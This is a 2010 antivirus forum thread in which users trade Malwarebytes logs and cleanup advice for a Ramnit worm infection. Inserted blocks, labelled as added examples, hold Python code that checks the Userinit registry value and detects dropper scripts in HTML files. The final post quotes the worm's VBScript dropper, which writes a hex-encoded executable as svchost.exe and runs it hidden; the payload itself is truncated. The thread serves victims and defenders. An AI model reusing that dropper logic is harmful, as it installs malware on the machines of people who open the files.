Author Topic: vbs:exedropper-gen[trj] and win32:ramnit-b  (Read 67636 times)


scoobertina

  • Guest
Re: vbs:exedropper-gen[trj] and win32:ramnit-b
« Reply #15 on: August 28, 2010, 08:04:12 PM »
I rescanned, and here you go. I have to go to work, so I will check in when I return home.

Thanks for all the help. I am a bit of a novice here.

Malwarebytes' Anti-Malware 1.46
www.malwarebytes.org

Database version: 4494

Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

8/28/2010 2:03:01 PM
mbam-log-2010-08-28 (14-03-01).txt

Scan type: Full scan (C:\|)
Objects scanned: 267873
Time elapsed: 2 hour(s), 0 minute(s), 33 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 8
Registry Values Infected: 0
Registry Data Items Infected: 2
Folders Infected: 0
Files Infected: 1

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{f02fabcb-92dd-475a-98af-14217bd50746} (Adware.Gamevance) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{0ed403e8-470a-4a8a-85a4-d7688cfe39a3} (Adware.Gamevance) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{f02fabcb-92dd-475a-98af-14217bd50746} (Adware.Gamevance) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{1d4db7d2-6ec9-47a3-bd87-1e41684e07bb} (Adware.MyWebSearch) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{af2e62b6-f9e1-4d4f-a10a-9dc8e6dcbcc0} (Adware.VideoEgg) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{3aa42713-5c1e-48e2-b432-d8bf420dd31d} (Rogue.AntiVirus2008) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{f10587e9-0e47-4cbe-abcd-7dd20b862223} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_CLASSES_ROOT\multimediaControls.chl (Trojan.Zlob) -> Quarantined and deleted successfully.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Trojan.PWS) -> Data: c:\program files\microsoft\desktoplayer.exe -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Hijack.UserInit) -> Bad: (c:\windows\system32\userinit.exe,,c:\program files\microsoft\desktoplayer.exe) Good: (userinit.exe) -> Quarantined and deleted successfully.

Folders Infected:
(No malicious items detected)

Files Infected:
C:\Program Files\Microsoft\DesktopLayer.exe (Trojan.PWS) -> Delete on reboot.
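
The two "Registry Data Items" lines in the log above are the most security-relevant finding: Winlogon's Userinit value was changed from plain userinit.exe to a comma-separated list whose second entry is DesktopLayer.exe, so Windows launched the malware at every logon. The Python below is an added example (not from this thread, MBAM or Avast) that splits a Userinit value the way Winlogon does, flags anything that is not userinit.exe, and extracts the Bad/Good values from an MBAM "Hijack.UserInit" log line so the log can be re-checked. The EXPECTED set assumes a default install under C:\Windows; the live-registry read uses the standard library winreg module and only runs on Windows.

```python
"""Check the Winlogon Userinit value for extra (persistence) entries.

Added example, not from the forum thread or any vendor tool. Winlogon runs
every comma-separated program listed in Userinit at logon, so any entry
besides userinit.exe is suspicious. Parsing is platform-independent; only
read_live_userinit() needs Windows.
"""
from __future__ import annotations

import re
import sys

WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Assumption: default install under C:\Windows. Adjust if %SystemRoot% differs.
EXPECTED = {"userinit.exe", r"c:\windows\system32\userinit.exe"}

# Matches the "Bad: (...) Good: (...)" part of an MBAM Hijack.UserInit line.
MBAM_HIJACK_RE = re.compile(r"Bad: \((?P<bad>.*?)\) Good: \((?P<good>.*?)\)")


def split_userinit(value: str) -> list[str]:
    """Split the comma-separated Userinit data into lower-cased program paths.

    The stock value ends in a trailing comma and the Ramnit variant in the log
    contains a doubled comma, so empty fields are dropped rather than treated
    as programs.
    """
    return [p.strip().strip('"').lower() for p in value.split(",") if p.strip()]


def suspicious_entries(value: str) -> list[str]:
    """Return every Userinit entry that is not the expected userinit.exe."""
    return [p for p in split_userinit(value) if p not in EXPECTED]


def parse_mbam_hijack(line: str) -> tuple[str, str]:
    """Pull the (bad, good) Userinit values out of an MBAM Hijack.UserInit line."""
    m = MBAM_HIJACK_RE.search(line)
    if not m:
        raise ValueError("not a Hijack.UserInit log line")
    return m.group("bad"), m.group("good")


def read_live_userinit() -> str:
    """Read the current Userinit value from HKLM (Windows only)."""
    import winreg  # standard library, present only on Windows

    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_KEY) as key:
        value, _value_type = winreg.QueryValueEx(key, "Userinit")
    return value


if __name__ == "__main__":
    # Log line copied from the MBAM report earlier in this thread.
    log_line = (
        r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit "
        r"(Hijack.UserInit) -> Bad: (c:\windows\system32\userinit.exe,,"
        r"c:\program files\microsoft\desktoplayer.exe) Good: (userinit.exe)"
    )
    bad, good = parse_mbam_hijack(log_line)
    print("from log :", suspicious_entries(bad))   # the DesktopLayer path
    print("clean    :", suspicious_entries(good))  # nothing
    if sys.platform == "win32":
        print("this host:", suspicious_entries(read_live_userinit()))
```

Run it on the infected host after cleanup to confirm the value really went back to userinit.exe; a scanner that "deletes" the bad entry but leaves the doubled comma is harmless, but any surviving second path means the persistence is still live.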

scoobertina

  • Guest
Re: vbs:exedropper-gen[trj] and win32:ramnit-b
« Reply #16 on: August 29, 2010, 08:41:49 AM »
Well, I have been home for a few hours, and I am not getting the pop-ups anymore. I want to thank SafeSurf. I am not sure I am done yet, but I know I will forget.

So thank you for all the help so far, and if we are done, thank you!

Tina

SafeSurf

  • Guest
Re: vbs:exedropper-gen[trj] and win32:ramnit-b
« Reply #17 on: August 29, 2010, 08:46:26 AM »
Hi Tina,

So is your machine and Avast working properly now after MBAM quarantined your infections?

SafeSurf

  • Guest
Re: vbs:exedropper-gen[trj] and win32:ramnit-b
« Reply #18 on: August 29, 2010, 08:56:12 AM »
To answer your question, no you are not done.

1. Do you have any passwords stored on your machine?  Gaming passwords or any other?  If so, delete the passwords as a precaution.

2. Update and run another MBAM scan and if anything comes up, put them in quarantine.  Copy and paste your log here in this thread.

3. Check the information on the first post of this thread under Virus/Worms for you to check your machine for malware: http://forum.avast.com/index.php?topic=53253.0.  You already did the MBAM part.  Scroll down to the red OTL and download the OTL file, which you need to download to your desktop.  Follow the instructions on the link I just gave you.  Attach 2 (large) OTL log files (located on your desktop) to your next post.  To attach: click "Additional Options" > Attach > browse (desktop) > post (you will need to attach 2 logs to your post).

Let me know if you have any questions.
« Last Edit: August 29, 2010, 08:57:54 AM by SafeSurf »

lectrotek

  • Guest
Re: vbs:exedropper-gen[trj] and win32:ramnit-b
« Reply #19 on: October 01, 2010, 05:25:20 PM »
Hi guys,

Looks like this little b*stard is a recent phenomenon.

I have exactly the same problem.

May I just say that this thread has been really helpful

BUT... for me, when the trojan had finished tearing through my PC (and when the virus chest was full), I got a 'WINDOWS FILE PROTECTION' pop-up saying that 'programs that are required for Windows to run properly have been replaced by unrecognised versions... please insert XP CD to restore the original versions'.

Now this didn't seem to be a problem at this stage; I just ignored the box (did not close it).

When I had finished an Avast full system scan (which showed no files infected), I then went on to do a Malwarebytes scan also, as suggested in this thread.

I opened Malwarebytes and clicked on 'update', but there was an error and Malwarebytes could not update. I then attempted to reopen Firefox (with the intention of downloading Malwarebytes again from scratch to get the latest definitions), but Firefox would not get beyond the 'previous session crashed' pop-up.

I then tried IE, but this proceeded to start installing itself, presumably a symptom as described by the above 'WINDOWS FILE PROTECTION' box that appeared.

I've no idea what to do now  :-\

I suppose I could do a Malwarebytes scan without the updated definitions, but as this is a comparatively new virus I don't know how useful this will be.

Many thanks in advance for any advice you may have

lectrotek

  • Guest
Re: vbs:exedropper-gen[trj] and win32:ramnit-b
« Reply #20 on: October 01, 2010, 06:00:40 PM »
I should say at this point that I'm writing this on another PC!

I've found out that I've got an old version of Malwarebytes, and this is why it won't connect to their server.

I'm downloading the new version and then I'll install it on the infected PC and run a scan.

I'm still very scared about the Windows pop-up though  :-\

lectrotek

  • Guest
Re: vbs:exedropper-gen[trj] and win32:ramnit-b
« Reply #21 on: October 04, 2010, 12:57:50 AM »
Right, I've run an MBAM scan twice. A second time after the avast scan showed no infections. The result of this final scan is:


Malwarebytes' Anti-Malware 1.41
Database version: 2968
Windows 5.1.2600 Service Pack 2 (Safe Mode)

15/10/2009 23:01:08
mbam-log-2009-10-15 (23-01-08).txt

Scan type: Full Scan (C:\|D:\|E:\|)
Objects scanned: 195983
Time elapsed: 1 hour(s), 36 minute(s), 16 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 1
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 1
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CURRENT_USER\SOFTWARE\{NSINAME} (Trojan.Agent) -> Quarantined and deleted successfully.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
C:\Documents and Settings\Timosee\Start Menu\Programs\UltraVideo (Trojan.DNSChanger) -> Quarantined and deleted successfully.

Files Infected:
(No malicious items detected)

lectrotek

  • Guest
Re: vbs:exedropper-gen[trj] and win32:ramnit-b
« Reply #22 on: October 04, 2010, 01:04:36 AM »
At this point I think I'm done. I've changed all my passwords etc.

However, Firefox does not work now.

1) Would this still be a symptom of the active virus, do you think?

I was thinking I may have to just uninstall and re-download.

2) Does anyone know how I can transfer my bookmarks to the new browser? Or are they gone for good?

(After restarting my PC after the first MBAM scan, Windows booted up fine and I was able to access IE as normal. Firefox seems to be the only casualty.)

lectrotek

  • Guest
Re: vbs:exedropper-gen[trj] and win32:ramnit-b
« Reply #23 on: October 04, 2010, 12:57:51 PM »
Hello, anyone there?!  :P

DavidR
Re: vbs:exedropper-gen[trj] and win32:ramnit-b
« Reply #24 on: October 04, 2010, 03:31:56 PM »
What exactly do you mean by "Firefox doesn't work now" (more detailed information required)? Doesn't open, opens but doesn't function correctly, displays errors, etc.?

It could be that the Firefox default profile has been corrupted/damaged, etc.
You could try creating a new user profile and see if that works; if not, it may be best to download the latest version, uninstall the current installation, reboot and reinstall.

http://support.mozilla.com/en-US/kb/Recovering+important+data+from+an+old+profile?s=create+new+profile&as=s
« Last Edit: October 04, 2010, 03:34:30 PM by DavidR »

lectrotek

  • Guest
Re: vbs:exedropper-gen[trj] and win32:ramnit-b
« Reply #25 on: October 04, 2010, 06:54:01 PM »
Quote from: DavidR on October 04, 2010, 03:31:56 PM
What exactly do you mean by "Firefox doesn't work now" (more detailed information required)? Doesn't open, opens but doesn't function correctly, displays errors, etc.?

It could be that the Firefox default profile has been corrupted/damaged, etc.
You could try creating a new user profile and see if that works; if not, it may be best to download the latest version, uninstall the current installation, reboot and reinstall.

http://support.mozilla.com/en-US/kb/Recovering+important+data+from+an+old+profile?s=create+new+profile&as=s

Hi David,

Ta for the reply. That link looks very useful.

RE: Firefox, when I double-click the icon, I get a crash report pop-up. When I click 'restore session', the pop-up just appears again. If I click 'quit' and then try to reopen Firefox from the desktop, again the pop-up appears.

To make things worse, Avast has just detected: win32Rootkit.gen (rtk)


Ah, to hell with it. I think I'll have to get the PC looked at by a pro. I'm out of my depth.

Cheers for the response.

SafeSurf

  • Guest
Re: vbs:exedropper-gen[trj] and win32:ramnit-b
« Reply #26 on: October 05, 2010, 07:29:10 AM »
lectrotek,

The version of MBAM that you used is outdated; the current version is 1.46 and always needs to be updated prior to doing a scan.

I suggest the following before you go out spending money on a Pro:

1. Update MBAM to the current version of 1.46; update the definitions, and run a FULL scan.  Quarantine any infected items.

2. Check the information on the first post of this thread under Virus/Worms for you to check your machine for malware: http://forum.avast.com/index.php?topic=53253.0

Follow the directions for obtaining an MBAM log (make sure you update MBAM first) and the OTL logs.  Post the MBAM log here (copy and paste) and the two (2) OTL logs as attachments (Additional Options > Attach > Browse (the logs will be on your desktop) > Post).  We can then analyze this in the meantime for any malware, and if any malware is found we will refer you to one of our malware experts.

Please let us know if you have any additional questions.  Thank you.

billatthebar

  • Guest
Re: vbs:exedropper-gen[trj] and win32:ramnit-b
« Reply #27 on: October 06, 2010, 12:48:54 AM »
OK, I'm new here. I've been researching this bloody virus all day and only today downloaded Avast, blah blah. I wasn't too concerned with security before, as I am always careful and I use Malwarebytes regularly anyway... but I forgot I have a retarded girlfriend, LOL. But anyway. I was out on Sunday and she texted me saying Bad Company 2 wouldn't work any more and that PunkBuster was playing up (the anti-cheat software), so I thought no problem, I'll have a look. So I ran a scan and found a few infected items, which wasn't really like my computer, as I like to keep it clean! Anyway, I fixed and rebooted, and much to my dismay the programs were still there. So I continued and started researching what the hell was wrong with my computer.

It turns out I have a process running called 'chrome' that isn't Google Chrome and is actually the virus working in the background, or a program related to the virus. This program is called 'desktoplayer' and is in the c:\program files\microsoft folder. It's crap and I couldn't delete it until the process was removed, and the process in Task Manager is only called chrome if you run Google Chrome! Otherwise it's called iexplorer or firefox (depending on what browser you use). Anyway, I got it deleted along with a few other files I searched for under the name srv.exe. I used search parameters so that the only files found would be created on today's date and be less than 100 KB (most were around 55 KB), and deleted those also. I downloaded a tool to clean Chrome's temporary files and a spyware cleaner, ran Malwarebytes (updated several times) and rebooted. Every time, desktoplayer was back in the folder, and for the life of me I cannot remove the little bastard.

It's stuck, so I downloaded Avast antivirus to give it a shot, and this is when it really got bad. It turns out that this virus is something known as a 'rootkit', or at least uses a rootkit to hide itself from your OS. It's a worm and attaches itself to basically every EXE on your computer, as well as a hell of a lot of DLL files. I know I've had this virus since the 3rd and today is the 5th, so that is 3 days, and I've been told by Avast that I have over 5000 infected files. None of my games work any more and I've caved and have to do a reinstall. I'm just posting my findings here so that hopefully it'll be of some use to somebody; I am rubbish at writing posts, however, LOL. So I'm backing up whatever pics and music/movies I can recover (as I'm pretty sure they are unaffected by the virus) and putting them on an external drive (which also needs formatting, as the worm spreads through drives!). It's relatively new, I assume, and is pretty bad, and apparently once your computer is compromised it is no longer safe, and a reinstall of Windows is recommended. There is a trojan that opens back-door ports in your computer allowing the hacker to steal passwords and bank details, and it has even been advised that you change passwords and details, but NOT FROM YOUR AFFECTED COMPUTER! This has been a headache, but nothing too major will be lost from a reinstall, so I'd rather be safe than sorry; just this time I think I'll keep Avast installed from the start, LOL. Oh yeah, the virus also deleted my restore points, so performing System Restore was out of the question. (The G key is broken on my keyboard, so sorry for that.) Anyway, this is all after hours and hours of reading and trying things myself. I've been at it most of the day and it seems pretty unfixable. Bite the bullet and reinstall before you can no longer back up files! Don't back up EXEs or DLLs, as they are infected.

If you want someone to blame, apparently this virus originated in Russia. Could have bloody guessed, and my computer has ended up like Chernobyl anyway, LOL.

Thanks, hope this helps someone.

billatthebar

  • Guest
Re: vbs:exedropper-gen[trj] and win32:ramnit-b
« Reply #28 on: October 06, 2010, 12:53:50 AM »
By the way, the reason your Firefox no longer works is probably because Avast has moved infected, essential components of your browser to its chest, so it hasn't got the ability to start!

billatthebar

  • Guest
Re: vbs:exedropper-gen[trj] and win32:ramnit-b
« Reply #29 on: October 06, 2010, 01:17:44 AM »
It also infects HTML files on your computer, adding this Visual Basic script to the end of each:

<script type='text/javascript'>
<SCRIPT Language=VBScript><!--
' Dropped file is named after a legitimate Windows process
DropFileName = "svchost.exe"
' Hex-encoded executable; 4D5A = "MZ", the start of a PE image (truncated in this post)
WriteData = "4D5A900003000000[...]"
Set FSO = CreateObject("Scripting.FileSystemObject")
' GetSpecialFolder(2) is the user's temp folder
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    ' Rebuild the binary one byte per pair of hex digits
    For i = 1 To Len(WriteData) Step 2
        FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
End If
' Launch the dropped file with a hidden window (window style 0)
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

What a menace, LOL. It's very new and very aggressive.
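
The dropper quoted above carries its executable inline as a hex string and rebuilds it byte by byte with Chr(CLng("&H" & ...)); VBScript in an HTML page only executes in Internet Explorer, which is why opening a "clean-looking" local .htm file is enough to re-drop the payload. The Python below is an added example (not from this thread, Avast or Malwarebytes) that finds this pattern in HTML files, performs the same hex decode without ever executing anything, and reports the drop name, size, SHA-256 and whether the bytes start with the MZ header. The sample HTML and its 16-byte hex stub are constructed for the demonstration; a real WriteData value is a complete executable, so the regex expects an unbroken run of hex digits and will not match the '[...]'-truncated copy in the post.

```python
"""Find and decode a Ramnit-style VBScript dropper appended to HTML files.

Added example, not from the forum post or any vendor tool. It mirrors the
dropper's own decode loop (two hex digits -> one byte) so the embedded
executable can be identified and hashed offline.
"""
from __future__ import annotations

import hashlib
import os
import re

# Anchored on the two assignments every copy of the dropper carries.
DROPPER_RE = re.compile(
    r'DropFileName\s*=\s*"(?P<name>[^"]+)"'
    r'.*?WriteData\s*=\s*"(?P<hex>[0-9A-Fa-f]+)"',
    re.DOTALL,
)


def find_dropper(html: str) -> dict | None:
    """Return drop_name/size/sha256/is_pe for an embedded dropper, or None."""
    m = DROPPER_RE.search(html)
    if not m:
        return None
    blob = m.group("hex")
    if len(blob) % 2:  # a genuine sample is an even number of hex digits
        blob = blob[:-1]
    payload = bytes.fromhex(blob)  # same bytes the Chr(CLng("&H"..)) loop writes
    return {
        "drop_name": m.group("name"),
        "size": len(payload),
        "sha256": hashlib.sha256(payload).hexdigest(),
        "is_pe": payload[:2] == b"MZ",  # 4D5A: start of every Windows PE image
    }


def scan_tree(root: str, exts: tuple[str, ...] = (".htm", ".html")) -> list[tuple[str, dict]]:
    """Walk a directory tree and list every HTML file carrying the dropper."""
    hits: list[tuple[str, dict]] = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", errors="ignore") as fh:
                    info = find_dropper(fh.read())
            except OSError:
                continue
            if info:
                hits.append((path, info))
    return hits


# Constructed sample: an ordinary page with the dropper appended. The hex
# value is a stub that only begins like a PE header; it is not an executable.
SAMPLE_HTML = """<html><body>hello</body></html>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\\" & DropFileName
//--></SCRIPT>
"""

if __name__ == "__main__":
    print(find_dropper(SAMPLE_HTML))
    # On a suspect machine: print(scan_tree(r"C:\Documents and Settings"))
```

Run scan_tree against the user profile and any web roots before the HTML files are copied to a backup drive: an infected page carries the full executable, so copying it forward carries the infection with it, and the SHA-256 lets the dropped file be matched against what Avast already quarantined.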